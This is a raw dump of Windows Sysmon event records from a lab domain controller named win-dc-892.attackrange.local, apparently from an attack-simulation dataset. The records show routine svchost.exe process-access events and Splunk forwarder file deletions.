12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:46.914{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B37C8C881E900126329D53A818C1596,SHA256=0F8378B6993CE2DA186190CC6FAA6E83D604B2BF2E4821FE7641EB33DA7798AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:47.961{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8212CDB31693AD686B5407EF56C51E54,SHA256=064F74B4D69A1E2DA68BEC2D9801E0ED34349B607C16B884796A4D6664ACB50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.914{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 